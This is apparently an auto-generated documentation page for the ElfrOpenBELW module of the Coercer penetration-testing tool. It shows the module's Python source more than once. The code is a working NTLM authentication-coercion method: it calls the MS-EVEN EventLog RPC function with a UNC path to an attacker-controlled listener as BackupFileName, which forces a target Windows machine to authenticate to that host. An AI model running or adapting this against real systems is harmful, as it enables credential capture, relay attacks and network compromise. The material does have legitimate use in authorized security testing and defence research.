coercer.methods.MS_EVEN.ElfrOpenBELW
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : ElfrOpenBELW.py 4# Author : Podalirius (@podalirius_) 5# Date created : 11 Dec 2022 6 7 8import random 9from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 10from coercer.network.DCERPCSessionError import DCERPCSessionError 11from impacket.dcerpc.v5 import even 12from impacket.dcerpc.v5.dtypes import NULL 13 14 15class ElfrOpenBELW(MSPROTOCOLRPCCALL): 16 """ 17 Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f) 18 19 Method found by: 20 - [@evilashz](https://github.com/evilashz/) 21 """ 22 23 exploit_paths = [ 24 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa') 25 ] 26 27 access = { 28 "ncan_np": [ 29 { 30 "namedpipe": r"\PIPE\eventlog", 31 "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea", 32 "version": "0.0" 33 } 34 ], 35 "ncacn_ip_tcp": [ 36 { 37 "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea", 38 "version": "0.0" 39 } 40 ] 41 } 42 43 protocol = { 44 "longname": "[MS-EVEN]: EventLog Remoting Protocol", 45 "shortname": "MS-EVEN" 46 } 47 48 function = { 49 "name": "ElfrOpenBELW", 50 "opnum": 9, 51 "vulnerable_arguments": ["BackupFileName"] 52 } 53 54 def trigger(self, dcerpc_session, target): 55 if dcerpc_session is not None: 56 try: 57 self.path = self.path.rstrip('\x00') 58 request = even.ElfrOpenBELW() 59 request['UNCServerName'] = NULL 60 request['BackupFileName'] = self.path 61 request['MajorVersion'] = random.randint(0,100) 62 request['MinorVersion'] = random.randint(0,100) 63 resp = dcerpc_session.request(request) 64 resp.dump() 65 return "" 66 except Exception as err: 67 return err 68 else: 69 print("[!] Error: dce is None, you must call connect() first.") 70 return None
16class ElfrOpenBELW(MSPROTOCOLRPCCALL): 17 """ 18 Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f) 19 20 Method found by: 21 - [@evilashz](https://github.com/evilashz/) 22 """ 23 24 exploit_paths = [ 25 ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa') 26 ] 27 28 access = { 29 "ncan_np": [ 30 { 31 "namedpipe": r"\PIPE\eventlog", 32 "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea", 33 "version": "0.0" 34 } 35 ], 36 "ncacn_ip_tcp": [ 37 { 38 "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea", 39 "version": "0.0" 40 } 41 ] 42 } 43 44 protocol = { 45 "longname": "[MS-EVEN]: EventLog Remoting Protocol", 46 "shortname": "MS-EVEN" 47 } 48 49 function = { 50 "name": "ElfrOpenBELW", 51 "opnum": 9, 52 "vulnerable_arguments": ["BackupFileName"] 53 } 54 55 def trigger(self, dcerpc_session, target): 56 if dcerpc_session is not None: 57 try: 58 self.path = self.path.rstrip('\x00') 59 request = even.ElfrOpenBELW() 60 request['UNCServerName'] = NULL 61 request['BackupFileName'] = self.path 62 request['MajorVersion'] = random.randint(0,100) 63 request['MinorVersion'] = random.randint(0,100) 64 resp = dcerpc_session.request(request) 65 resp.dump() 66 return "" 67 except Exception as err: 68 return err 69 else: 70 print("[!] Error: dce is None, you must call connect() first.") 71 return None
Coercing a machine to authenticate using function ElfrOpenBELW (opnum 9) of MS-EVEN: EventLog Remoting Protocol
Method found by:
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\eventlog', 'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}], 'ncacn_ip_tcp': [{'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}]}
def
trigger(self, dcerpc_session, target):
55 def trigger(self, dcerpc_session, target): 56 if dcerpc_session is not None: 57 try: 58 self.path = self.path.rstrip('\x00') 59 request = even.ElfrOpenBELW() 60 request['UNCServerName'] = NULL 61 request['BackupFileName'] = self.path 62 request['MajorVersion'] = random.randint(0,100) 63 request['MinorVersion'] = random.randint(0,100) 64 resp = dcerpc_session.request(request) 65 resp.dump() 66 return "" 67 except Exception as err: 68 return err 69 else: 70 print("[!] Error: dce is None, you must call connect() first.") 71 return None